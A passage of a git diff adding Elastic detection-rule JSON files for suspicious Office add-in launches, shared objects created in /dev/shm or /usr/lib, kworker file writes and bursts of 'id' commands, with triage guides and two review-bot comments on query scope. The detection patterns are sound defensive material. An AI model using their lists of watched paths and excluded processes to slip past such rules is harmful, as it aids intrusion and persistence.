{{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed 
these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious Kworker UID Elevation - 7dfaaa17-425c-4fe7-bd36-83705fde7c2b\n- Network Activity Detected via Kworker - 25d917c4-aa3c-4111-974c-286c0312ff95\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where event.action in (\"creation\", \"file_create_event\") and process.name : \"kworker*\" and not (\n (process.name : \"kworker*kcryptd*\") or \n (file.path : (\"/var/log/*\", \"/var/crash/*\", \"/var/run/*\", \"/var/lib/systemd/coredump/*\", \"/var/spool/*\"))\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "ae343298-97bc-47bc-9ea2-5f2ad831c16e_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4.json new file mode 100644 index 00000000000..f4488de327e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4.json 
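Review bot: The `index` pattern `"logs-endpoint.events.*"` on this rule matches every Elastic Defend event data stream (process, network, library, registry, ...) although the query only evaluates `file where ...`, so each run scans far more documents than it can alert on. In the same commit, ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5 narrows its process rule to `"logs-endpoint.events.process-*"`; the analogous scope for this file-event rule is `"logs-endpoint.events.file-*"`, and aebaa51f-2a91-4f6a-850b-b601db2293f4_7 in this commit carries the same broad pattern for a file rule. Before narrowing, confirm no deployment relies on file events being routed to a different endpoint data stream, since the change would silently drop those from the rule's view.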
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of common Microsoft Office applications to launch an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to get initial access via a malicious phishing MS Office Add-In.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Microsoft Office Add-Ins", + "query": "process where \n \n host.os.type == \"windows\" and event.type == \"start\" and \n \n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSACCESS.EXE\", \"VSTOInstaller.exe\") and \n \n process.args regex~ \"\"\".+\\.(wll|xll|ppa|ppam|xla|xlam|vsto)\"\"\" and \n \n /* Office Add-In from suspicious paths */\n (process.args :\n (\"?:\\\\Users\\\\*\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Rar$*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\BNZ.*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\*\",\n \"?:\\\\Users\\\\Public\\\\*\",\n \"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Windows\\\\Temp\\\\*\",\n \"\\\\Device\\\\*\",\n \"http*\") or\n\t \n process.parent.name : (\"explorer.exe\", \"OpenWith.exe\") or \n \n /* Office Add-In from suspicious parent */\n process.parent.name : (\"cmd.exe\", \"powershell.exe\")) and\n\t \n /* False Positives */\n not (process.args : \"*.vsto\" and\n process.parent.executable :\n (\"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility*.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptions\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility.exe\",\n \"?:\\\\Program Files\\\\LogiOptionsPlus\\\\PlugInInstallerUtility*.exe\",\n 
\"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\VSTO\\\\*\\\\VSTOInstaller.exe\")) and\n not (process.args : \"/Uninstall\" and process.name : \"VSTOInstaller.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : \"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\") and\n not (process.name : \"VSTOInstaller.exe\" and process.args : \"https://dl.getsidekick.com/outlook/vsto/Sidekick.vsto\")\n", + "references": [ + "https://github.com/Octoberfest7/XLL_Phishing", + "https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": 
"https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 4 + }, + "id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5.json b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5.json new file mode 100644 index 00000000000..ac610e53e7a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5.json 
@@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of common Microsoft Office applications to launch an Office Add-In from a suspicious path or with an unusual parent process. This may indicate an attempt to get initial access via a malicious phishing MS Office Add-In.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Execution via Microsoft Office Add-Ins", + "query": "process where \n \n host.os.type == \"windows\" and event.type == \"start\" and \n \n process.name : (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\", \"MSACCESS.EXE\", \"VSTOInstaller.exe\") and \n \n process.args regex~ \"\"\".+\\.(wll|xll|ppa|ppam|xla|xlam|vsto)\"\"\" and \n \n /* Office Add-In from suspicious paths */\n (process.args :\n (\"?:\\\\Users\\\\*\\\\Temp\\\\7z*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Rar$*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\Temp?_*\",\n \"?:\\\\Users\\\\*\\\\Temp\\\\BNZ.*\",\n \"?:\\\\Users\\\\*\\\\Downloads\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\*\",\n \"?:\\\\Users\\\\Public\\\\*\",\n \"?:\\\\ProgramData\\\\*\",\n \"?:\\\\Windows\\\\Temp\\\\*\",\n \"\\\\Device\\\\*\",\n \"http*\") or\n\t \n process.parent.name : (\"explorer.exe\", \"OpenWith.exe\") or \n \n /* Office Add-In from suspicious parent */\n process.parent.name : (\"cmd.exe\", \"powershell.exe\")) and\n\t \n /* False Positives */\n not (process.args : \"*.vsto\" and\n process.parent.executable :\n (\"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility*.exe\",\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptions\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Logitech\\\\LogiOptions\\\\PlugInInstallerUtility.exe\",\n \"?:\\\\Program Files\\\\LogiOptionsPlus\\\\PlugInInstallerUtility*.exe\",\n 
\"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptionsPlus\\\\Plugins\\\\VSTO\\\\*\\\\VSTOInstaller.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\VSTO\\\\*\\\\VSTOInstaller.exe\")) and\n not (process.args : \"/Uninstall\" and process.name : \"VSTOInstaller.exe\") and\n not (process.parent.name : \"rundll32.exe\" and\n process.parent.args : \"?:\\\\WINDOWS\\\\Installer\\\\MSI*.tmp,zzzzInvokeManagedCustomActionOutOfProc\") and\n not (process.name : \"VSTOInstaller.exe\" and process.args : \"https://dl.getsidekick.com/outlook/vsto/Sidekick.vsto\")\n", + "references": [ + "https://github.com/Octoberfest7/XLL_Phishing", + "https://labs.f-secure.com/archive/add-in-opportunities-for-office-persistence/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": 
"https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1137", + "name": "Office Application Startup", + "reference": "https://attack.mitre.org/techniques/T1137/", + "subtechnique": [ + { + "id": "T1137.006", + "name": "Add-ins", + "reference": "https://attack.mitre.org/techniques/T1137/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "ae8a142c-6a1d-4918-bea7-0b617e99ecfa_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_7.json b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_7.json new file mode 100644 index 00000000000..60dfc020829 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aebaa51f-2a91-4f6a-850b-b601db2293f4_7.json 
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the creation of shared object files by previously unknown processes. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime. While this process is typically used for legitimate purposes, malicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data.", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Shared Object Created or Changed by Previously Unknown Process", + "new_terms_fields": [ + "host.id", + "file.path", + "process.executable" + ], + "note": "## Triage and analysis\n\n### Investigating Shared Object Created or Changed by Previously Unknown Process\n\nA shared object file is a compiled library file (typically with a .so extension) that can be dynamically linked to executable programs at runtime, allowing for code reuse and efficient memory usage. The creation of a shared object file involves compiling code into a dynamically linked library that can be loaded by other programs at runtime.\n\nMalicious actors can leverage shared object files to execute unauthorized code, inject malicious functionality into legitimate processes, or bypass security controls. 
This allows malware to persist on the system, evade detection, and potentially compromise the integrity and confidentiality of the affected system and its data.\n\nThis rule monitors the creation of shared object files by previously unknown processes through the usage of the new terms rule type.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the shared object that was created or modified through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE path = {{file.path}}\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve 
Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:linux and event.action:(creation or file_create_event or file_rename_event or rename) and \nfile.path:(/dev/shm/* or /usr/lib/*) and file.extension:so and process.name:* and not (\n process.name:(\"dockerd\" or \"dpkg\" or \"rpm\" or \"snapd\" or \"yum\" or \"vmis-launcher\" or \"pacman\" or\n \"apt-get\" or \"dnf\" or \"podman\" or \"platform-python\") or \n (process.name:vmware-install.pl and file.path:/usr/lib/vmware-tools/*)\n)\n", + "references": [ + "https://threatpost.com/sneaky-malware-backdoors-linux/180158/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aebaa51f-2a91-4f6a-850b-b601db2293f4", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.006", + "name": "Dynamic Linker Hijacking", + "reference": "https://attack.mitre.org/techniques/T1574/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 7 + }, + "id": "aebaa51f-2a91-4f6a-850b-b601db2293f4_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_4.json b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_4.json new file mode 100644 index 00000000000..f4d6e794c9e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/afa135c0-a365-43ab-aa35-fd86df314a47_4.json 
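Review bot: `file.extension:so` in the query will not match versioned shared objects such as `libfoo.so.1`, because ECS `file.extension` holds only the last suffix (`1` in that example), and versioned names are the common form under `/usr/lib/`, one of the two paths the rule watches. Adding a path clause alongside it, `file.path:(/dev/shm/* or /usr/lib/*) and (file.extension:so or file.path:*.so.*)`, covers both shapes without changing the exclusion list. The `new_terms_fields` entry `process.executable` is not required by the query (only `process.name:*` is), so confirm how the new-terms evaluation treats events where `process.executable` is absent before relying on that field for baselining.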
@@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for a sequence of 20 \"id\" command executions within 1 second by the same parent process. This behavior is unusual, and may be indicative of the execution of an enumeration script such as LinPEAS or LinEnum. These scripts leverage the \"id\" command to enumerate the privileges of all users present on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual User Privilege Enumeration via id", + "query": "sequence by host.id, process.parent.entity_id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name == \"id\" and process.args_count == 2 and \n not (process.parent.name == \"rpm\" or process.parent.args : \"/var/tmp/rpm-tmp*\")] with runs=20\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "afa135c0-a365-43ab-aa35-fd86df314a47", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1033", + "name": "System Owner/User Discovery", + "reference": "https://attack.mitre.org/techniques/T1033/" + } + ] + } + ], + "type": "eql", + "version": 4 + }, + "id": "afa135c0-a365-43ab-aa35-fd86df314a47_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/afcce5ad-65de-4ed2-8516-5e093d3ac99a_106.json 